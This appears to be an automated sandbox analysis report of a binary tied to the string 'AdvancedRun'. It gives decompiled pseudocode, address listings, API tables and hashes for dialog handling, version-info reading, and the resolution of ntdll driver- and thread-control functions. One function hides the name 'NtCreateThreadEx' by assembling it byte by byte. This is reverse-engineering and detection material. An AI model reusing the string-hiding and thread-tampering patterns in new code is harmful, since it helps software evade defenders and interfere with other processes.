					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                      0x00401093
                                                                                      0x00401096
                                                                                      0x00401097
                                                                                      0x0040109b
                                                                                      0x004010a3
                                                                                      0x004010a5
                                                                                      0x00401270
                                                                                      0x00401278
                                                                                      0x004012b3
                                                                                      0x0040127a
                                                                                      0x00401293
                                                                                      0x004012a2
                                                                                      0x004012a2
                                                                                      0x004012c1
                                                                                      0x004012d9
                                                                                      0x004012ea
                                                                                      0x004012ec
                                                                                      0x004012f6
                                                                                      0x00000000
                                                                                      0x004010ab
                                                                                      0x004010ab
                                                                                      0x004010ac
                                                                                      0x00401231
                                                                                      0x00401236
                                                                                      0x00401239
                                                                                      0x0040123d
                                                                                      0x00401249
                                                                                      0x00401249
                                                                                      0x0040124c
                                                                                      0x00000000
                                                                                      0x00401252
                                                                                      0x00401259
                                                                                      0x00401265
                                                                                      0x00000000
                                                                                      0x00401265
                                                                                      0x0040123f
                                                                                      0x0040123f
                                                                                      0x00401243
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00401243
                                                                                      0x004010b2
                                                                                      0x004010b2
                                                                                      0x004010b5
                                                                                      0x004011e1
                                                                                      0x004011e3
                                                                                      0x004011e6
                                                                                      0x0040120e
                                                                                      0x00401216
                                                                                      0x00000000
                                                                                      0x0040121c
                                                                                      0x00401224
                                                                                      0x00401226
                                                                                      0x00401229
                                                                                      0x00000000
                                                                                      0x0040122f
                                                                                      0x00000000
                                                                                      0x0040122f
                                                                                      0x00401229
                                                                                      0x004011e8
                                                                                      0x004011e8
                                                                                      0x004011ed
                                                                                      0x004011fb
                                                                                      0x00401203
                                                                                      0x00401203
                                                                                      0x004010bb
                                                                                      0x004010bb
                                                                                      0x004010c0
                                                                                      0x00401151
                                                                                      0x0040115a
                                                                                      0x00401168
                                                                                      0x0040116b
                                                                                      0x0040116e
                                                                                      0x00401170
                                                                                      0x00401173
                                                                                      0x00401180
                                                                                      0x00401182
                                                                                      0x00401185
                                                                                      0x004011a4
                                                                                      0x004011ac
                                                                                      0x00000000
                                                                                      0x004011b2
                                                                                      0x004011ba
                                                                                      0x004011bc
                                                                                      0x004011c7
                                                                                      0x004011c9
                                                                                      0x004011cb
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x004011cb
                                                                                      0x00401187
                                                                                      0x00401187
                                                                                      0x00401199
                                                                                      0x00000000
                                                                                      0x00401199
                                                                                      0x004010c6
                                                                                      0x004010c8
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004010ce
                                                                                      0x004010ce
                                                                                      0x004010d7
                                                                                      0x004010e5
                                                                                      0x004010e8
                                                                                      0x004010eb
                                                                                      0x004010ed
                                                                                      0x004010f0
                                                                                      0x00401102
                                                                                      0x0040111d
                                                                                      0x00401125
                                                                                      0x00000000
                                                                                      0x0040112b
                                                                                      0x00401133
                                                                                      0x00401135
                                                                                      0x00401140
                                                                                      0x00401142
                                                                                      0x00401144
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x0040114a
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x00401144
                                                                                      0x00401104
                                                                                      0x0040110a
                                                                                      0x0040110b
                                                                                      0x0040110b
                                                                                      0x0040110e
                                                                                      0x00401115
                                                                                      0x00401117
                                                                                      0x00401117
                                                                                      0x00401102
                                                                                      0x004010c8
                                                                                      0x004010c0
                                                                                      0x004010b5
                                                                                      0x004010ac
                                                                                      0x00401303

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                      • String ID: AdvancedRun
                                                                                      • API String ID: 829165378-481304740
                                                                                      • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                      • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                      0x00408e38
                                                                                      0x00408e44
                                                                                      0x00408e56
                                                                                      0x00408e68
                                                                                      0x00408e7a
                                                                                      0x00408e8c
                                                                                      0x00408e9e
                                                                                      0x00408eb0
                                                                                      0x00408ec2
                                                                                      0x00408ed4
                                                                                      0x00408ee6
                                                                                      0x00408ef8
                                                                                      0x00408f0a
                                                                                      0x00408f1c
                                                                                      0x00408f21
                                                                                      0x00408f23
                                                                                      0x00000000
                                                                                      0x00408f28
                                                                                      0x00408f29

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                      • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                      • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                      • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                      • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                      • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                      • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                      • API String ID: 667068680-4280973841
                                                                                      • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                      • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                      • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                      • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 45%
                                                                                      			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                      0x00408ae3
                                                                                      0x00408aeb
                                                                                      0x00408af3
                                                                                      0x00408b76
                                                                                      0x00408b8a
                                                                                      0x00408b91
                                                                                      0x00408b98
                                                                                      0x00408bb1
                                                                                      0x00408bb3
                                                                                      0x00408bc6
                                                                                      0x00408bcc
                                                                                      0x00408bda
                                                                                      0x00408be0
                                                                                      0x00408bf3
                                                                                      0x00408bfa
                                                                                      0x00408c0b
                                                                                      0x00408c12
                                                                                      0x00408c17
                                                                                      0x00408c1a
                                                                                      0x00408c2c
                                                                                      0x00408c39
                                                                                      0x00408c3d
                                                                                      0x00408c3f
                                                                                      0x00408c41
                                                                                      0x00408c52
                                                                                      0x00408c58
                                                                                      0x00408c58
                                                                                      0x00408c6f
                                                                                      0x00408c71
                                                                                      0x00408c73
                                                                                      0x00408c83
                                                                                      0x00408c89
                                                                                      0x00408c89
                                                                                      0x00408c8a
                                                                                      0x00408c8f
                                                                                      0x00408c91
                                                                                      0x00408c9a
                                                                                      0x00408c93
                                                                                      0x00408c93
                                                                                      0x00408c93
                                                                                      0x00408c9f
                                                                                      0x00408ca5
                                                                                      0x00408caf
                                                                                      0x00408cbc
                                                                                      0x00408cc2
                                                                                      0x00408cc7
                                                                                      0x00408ccd
                                                                                      0x00408cd0
                                                                                      0x00408cd6
                                                                                      0x00408cd7
                                                                                      0x00408cd8
                                                                                      0x00408cde
                                                                                      0x00408ce3
                                                                                      0x00408ceb
                                                                                      0x00408cfe
                                                                                      0x00408d03
                                                                                      0x00408d06
                                                                                      0x00408d0c
                                                                                      0x00408d21
                                                                                      0x00408d27
                                                                                      0x00408d0c
                                                                                      0x00000000
                                                                                      0x00408ca7
                                                                                      0x00408ca7
                                                                                      0x00408cad
                                                                                      0x00408d28
                                                                                      0x00408d2e
                                                                                      0x00408d35
                                                                                      0x00408d36
                                                                                      0x00408d42
                                                                                      0x00408d48
                                                                                      0x00408d4e
                                                                                      0x00408d54
                                                                                      0x00408d5a
                                                                                      0x00408d60
                                                                                      0x00408d66
                                                                                      0x00408d6c
                                                                                      0x00408d72
                                                                                      0x00408d73
                                                                                      0x00408d7f
                                                                                      0x00408d85
                                                                                      0x00408d8a
                                                                                      0x00408d8f
                                                                                      0x00408d90
                                                                                      0x00408da8
                                                                                      0x00408db9
                                                                                      0x00408dbf
                                                                                      0x00408dc5
                                                                                      0x00408dc5
                                                                                      0x00000000
                                                                                      0x00408cad
                                                                                      0x00408ca5
                                                                                      0x00408af6
                                                                                      0x00408afc
                                                                                      0x00408b07
                                                                                      0x00408b2a
                                                                                      0x00408b38
                                                                                      0x00408b53
                                                                                      0x00408b56
                                                                                      0x00408b62
                                                                                      0x00408b6a
                                                                                      0x00408b6a
                                                                                      0x00408b2a
                                                                                      0x00408b07
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      • {Unknown}, xrefs: 00408BA5
                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                      • API String ID: 4111938811-1819279800
                                                                                      • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                      • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 82%
                                                                                      			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                      0x0040b04d
                                                                                      0x0040b05e
                                                                                      0x0040b060
                                                                                      0x0040b063
                                                                                      0x0040b06a
                                                                                      0x0040b06d
                                                                                      0x0040b076
                                                                                      0x0040b07b
                                                                                      0x0040b07e
                                                                                      0x0040b084
                                                                                      0x0040b08e
                                                                                      0x0040b0a8
                                                                                      0x0040b0aa
                                                                                      0x0040b0ad
                                                                                      0x0040b0b0
                                                                                      0x0040b0b3
                                                                                      0x0040b0b6
                                                                                      0x0040b0b8
                                                                                      0x0040b0bb
                                                                                      0x0040b0be
                                                                                      0x0040b0c1
                                                                                      0x0040b0c4
                                                                                      0x0040b0c7
                                                                                      0x0040b0ca
                                                                                      0x0040b0cd
                                                                                      0x0040b0cd
                                                                                      0x0040b0e5
                                                                                      0x0040b11f
                                                                                      0x0040b128
                                                                                      0x0040b0e7
                                                                                      0x0040b0e7
                                                                                      0x0040b0f1
                                                                                      0x0040b0f2
                                                                                      0x0040b0f3
                                                                                      0x0040b0fb
                                                                                      0x0040b0fd
                                                                                      0x0040b0fe
                                                                                      0x0040b11d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040b11d
                                                                                      0x0040b13c
                                                                                      0x0040b151
                                                                                      0x0040b166
                                                                                      0x0040b17b
                                                                                      0x0040b190
                                                                                      0x0040b1a5
                                                                                      0x0040b1ba
                                                                                      0x0040b1cf
                                                                                      0x0040b1d6
                                                                                      0x0040b1d7
                                                                                      0x0040b1d8
                                                                                      0x0040b1de
                                                                                      0x0040b1e3

                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                      • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                      • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                      • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                      • wcscpy.MSVCRT ref: 0040B128
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                      • API String ID: 1223191525-1542517562
                                                                                      • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                      • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 76%
                                                                                      			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                      0x0040a1f8
                                                                                      0x0040a26d
                                                                                      0x00000000
                                                                                      0x0040a26f
                                                                                      0x0040a205
                                                                                      0x0040a20b
                                                                                      0x0040a20d
                                                                                      0x0040a213
                                                                                      0x0040a214
                                                                                      0x0040a215
                                                                                      0x0040a216
                                                                                      0x0040a217
                                                                                      0x0040a219
                                                                                      0x0040a21f
                                                                                      0x0040a223
                                                                                      0x0040a227
                                                                                      0x0040a22b
                                                                                      0x0040a22f
                                                                                      0x0040a233
                                                                                      0x0040a237
                                                                                      0x0040a23b
                                                                                      0x0040a23f
                                                                                      0x0040a243
                                                                                      0x0040a247
                                                                                      0x0040a24b
                                                                                      0x0040a24f
                                                                                      0x0040a253
                                                                                      0x0040a257
                                                                                      0x0040a25b
                                                                                      0x0040a25f
                                                                                      0x0040a269
                                                                                      0x00000000
                                                                                      0x0040a26c
                                                                                      0x0040a271

                                                                                      APIs
